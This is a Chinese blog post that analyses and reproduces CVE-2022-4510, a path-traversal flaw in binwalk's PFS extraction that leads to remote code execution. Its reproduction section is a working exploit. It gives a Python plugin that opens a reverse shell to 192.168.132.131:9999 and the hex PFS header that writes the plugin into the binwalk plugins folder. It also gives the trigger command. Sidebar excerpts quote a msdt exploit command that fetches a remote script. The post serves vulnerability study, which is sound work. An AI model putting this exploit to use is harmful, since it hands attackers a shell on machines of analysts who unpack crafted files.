CVE-2022-4510:Binwalk 远程代码执行漏洞

已于 2023-07-03 09:27:28 修改
阅读量785 收藏 2
点赞数
分类专栏: 安全 文章标签: web安全 CVE-2022-4510 binwalk
于 2023-07-03 09:23:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/131509099
版权

一、CVE-2022-4510介绍

1.1、漏洞介绍

binwalk是一款常用的二进制文件提取工具,在固件分析和CTF Misc中使用广泛。在ReFirm Labs binwalk(包括版本2.1.2b至2.3.3),存在一个路径穿越漏洞,允许攻击者构造恶意文件,当使用binwalk的-e选项对该恶意文件进行自动提取时,将触发漏洞,将攻击者构造的恶意文件中内嵌的文件写入提取目录之外的路径。这还可能导致远程代码执行。
  • kali linux自带binwalk工具
  • CVE 编号:CVE-2022-4510
  • 影响范围:版本2.1.2b至2.3.3
  • 漏洞分类:RCE
  • CVSS评分:7.8 HIGH

1.2、漏洞描述

在从2.1.2b版到2.3.3版的ReFirm Labs binwalk中发现了一个路径遍历漏洞。
通过手工创建一个恶意的PFS文件系统文件,当binwalk在提取模式(-e选项)下运行时,攻击者可以让binwalk的PFS提取程序在任意位置提取文件。远程代码执行可以通过构建PFS文件系统来实现,该文件系统在解压缩时会将恶意的binwalk模块提取到文件夹 $HOME/.config/binwalk/plugins 。此漏洞与程序文件src/binwalk/plugins/unpfs.py相关。此问题影响从2.1.2b到2.3.3的binwalk。
影响版本:Binwalk v2.1.2b-2.3.3
已修复:2.3.4版本

1.3、漏洞分析

这个漏洞 源于binwalk解析PFS文件时的防路径穿越代码存在问题。它使用类似下面的代码来检测是否存在路径穿越:
kali机器: /usr/lib/python3/dist-packages/binwalk/plugins/unpfs.py
问题出现在os.path.join函数上,因为代码“outfile_path = os.path.join(out_dir, entry.fname)”没有完全进行路径解析,所以下行的代码“if not outfile_path.startswith(out_dir):”的条件就永远不会为真。
   
假如攻击者把PFS文件内嵌的某个文件的名字设置成"../test.txt",那么outfile_path为"提取路径/../test.txt",第2行的if语句永远成立,故这个检测是无效的。
此外,binwalk的插件存放路径下的python文件将被当成binwalk的插件,在binwalk每次执行的时候自动调用。所以,假如利用路径穿越漏洞将一个特制python脚本写入binwalk的插件存放路径下,即可实现RCE。

二、漏洞复现

环境:推荐kali(自带binwalk) 

2.1、默认POC

可以看到是pfs文件:
借助 Hxd工具使用二进制方式打开:

2.1.1、poc文件放在$HOME目录下执行

将poc.zip放到$HOME目录下,再执行binwalk
恶意插件很简单:
  
import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
    """
    Malicious binwalk plugin
    """
    def init(self):
        print("hello from malicious plugin")

 2.1.2、poc文件放在/root/桌面/目录下执行

当将poc.zip放在/root/桌面/上再执行binwalk没有导致远程代码执行:
先对 /usr/lib/python3/dist-packages/binwalk/plugins/unpfs.py 增加几行日志以便于分析
binwalk执行:
分析原因是未在$HOME/.config/binwalk/plugin/下生成 malwalk.py文件,而是在 /root/桌面/目录下生成了.config/文件夹
为何会在 /root/桌面/目录下生成了.config/文件夹???
看输出的outfile_Path,它实际指向的就是/root/桌面/.config/binwalk/plugins/malwalk.py
增加一个../,就可以让在/root/桌面/poc.zip解包时产生/root/.config/binwalk/plugins/malwalk.py,如下:
此时在binwalk解包: 报错:E rror loading plugin 'malwalk.py': source code string cannot contain null bytes
的确在/root/.config/binwalk/plugins/下生成了malwalk.py:
根据 Valueerror: source code string cannot contain null bytes ( Solved )所述, 是因为 源代码字符串包含了三个空字节
猜想:是不是因为我前面添加了../导致的,那就在malicious.pfs文件中删除三个空字符,如下:
再执行binwalk :成功了
  

2.1.3、poc文件放在/root/桌面/目录下,binwalk解包使用-C指令解包到指定位置

当用-C指定解压存储路径时,要对malicious.pfs文件进行修改(是否增加或删减../,同时要增加删减NUL)
-C root/桌面/tt/,若要在/root目录下生成.config/,得左移两次,即添加两个../、删除对应个数的NUL

2.2、自定义POC

用户可以使用binwalk的 API 定义自己的插件,只需要把插件放在 $HOME/ .config/binwalk/plugins/ 目录下,之后运行binwalk时就会调用插件
构造RCE的POC,在解压后的文件中保持文件头和路径,后面加上下面的脚本代码,并且把长度改一下,然后保存成一个压缩包malicious.zip
1、exp.py: 提示:在 s .connect中写入要连接的ip地址和监听端口 
import binwalk.core.plugin
import socket,subprocess,os,pty

class MaliciousExtractor(binwalk.core.plugin.Plugin):
   def init(self):
       s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
       s.connect(("192.168.132.131", 9999))
       os.dup2(s.fileno(),0)
       os.dup2(s.fileno(),1)
       os.dup2(s.fileno(),2)
       pty.spawn("sh")
2、用HXD工具将exp.py文件打开,粘贴以下十六进制数据到头部 
5046 532f 302e 3900 0000 0000 0000 0100
2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967
2f62 696e 7761 6c6b 2f70 6c75 6769 6e73
2f6d 616c 7761 6c6b 2e70 7900 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000 0000
3412 0000 a000 0000 c100 0000
3、然后另存为malicious.pfs文件:
4、将malicious.pfs打包成malicious.zip文件。
5、当 从用户的主目录中( cd $HOME )用binwalk提取文件时,会在.config/binwalk/plugins加入一个插件,这个恶意插件随后会被 binwalk 加载和执行,从而导致 RCE
binwalk -Me malicious.zip 然后就可以 RCE:

2.3、项目中的应用

构造一个poc测试产品项目:
查看136环境日志:发现爆出漏洞
构造234环境上的poc:

三、参考

青霄
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
scalpel是一款命令行漏洞扫描工具,支持深度参数注入,拥有一个强大的数据解析和变异算法
12-27
scalpel是一款命令行漏洞扫描工具,支持深度参数注入,拥有一个强大的数据解析和变异算法,可以将常见的数据格式(json, xml, form等)解析为树结构,然后根据poc中的规则,对树进行变异,包括对叶子节点和树结构 的变异。变异完成之后,将树结构还原为原始的数据格式….
RCE(远程代码执行漏洞)原理及漏洞利用
热门推荐
Ciyaso的博客
07-19 3万+
作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从
RCE(远程命令执行漏洞详解
最新发布
sev1n的博客
04-02 1390
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
远程代码执行漏洞
kali_Ma的博客
10-30 1994
发现data.headers中出现了x-real-ip:127.0.0.1 ,这是我们调用batch-requests插件传递的头信息,而此时系统默认的X-Real-IP为大写。在请求头覆盖中、因为 real_ip_hdr 为 X-Real-IP , 函数core.request.get_remote_clinte_ip()获取远程客户端ip、不能将 x-real-ip给覆盖。通过遍历表结构、获取到 real_ip_header 的值然后再赋值给real_ip_hdr。该值为在系统启动后、给定的默认值。
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 7937
这周来学习下命令执行漏洞;命令执行漏洞是用户通过浏览器在远程服务器上执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客中详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时...
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行代码执行
weixin_52796034的博客
10-26 1607
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 910
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 3537
Discuz v3.4系列 远程代码执行漏洞全流程详解
远程代码/命令执行漏洞学习(一)
love_wgll的博客
02-23 551
远程代码/命令执行漏洞
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
固件解包--binwalk分析
samli的博客
09-23 2829
Binwalk binwalk完整安装 binwalk/INSTALL.md at master · ReFirmLabs/binwalk · GitHub binwalk -h Binwalk v2.2.0-ff34b12 Craig Heffner, ReFirmLabs https://github.com/ReFirmLabs/binwalk Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ... Sig...
ctfshow misc入门wp
m0_58030673的博客
01-31 5458
ctfshow misc入门wp,是关于图片类型隐写的题目
binwalk-解包工具
无痕的博客
07-05 4490
介绍了binwalk的安装、使用、python调用
网络安全漏洞分析之远程代码执行
2301_77899321的博客
10-10 247
网络安全指的是保护计算机网络及其相关设备、系统和数据不受未经授权访问、破坏、篡改或泄露的一系列措施和技术。网络安全的目标是确保计算机网络的保密性、完整性和可用性,以及防止未经授权的访问和恶意行为。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值